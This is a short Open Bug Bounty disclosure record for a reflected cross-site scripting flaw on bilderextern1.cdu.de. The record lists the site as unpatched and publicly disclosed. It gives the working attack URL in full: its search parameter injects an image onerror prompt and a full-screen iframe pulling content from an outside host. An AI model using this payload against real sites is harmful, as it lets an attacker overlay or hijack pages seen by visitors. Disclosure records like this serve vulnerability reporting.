bilderextern1.cdu.de XSS vulnerability

2015-07-08T10:38:00
ID OBB:70486
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T10:41:00

Description

Vulnerable URL:
http://bilderextern1.cdu.de/bilder.html?currentContainerId=2&preview;=false&searchText;=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28%2fXSSPOSED%2f%29%3E%3Ciframe%20style%3Dposition%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bmin-height%3A1000px%3Bheight%3A100%25%3Bborder%3Anone%3Bz-index%3A999%20src%3D%2f%2fwww.sicherheit-online.org%2fxternal%2fstorm.html%3E%3C%2fiframe%3E&x;=37&y;=8
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check bilderextern1.cdu.de SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 10:38 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 10:41 GMT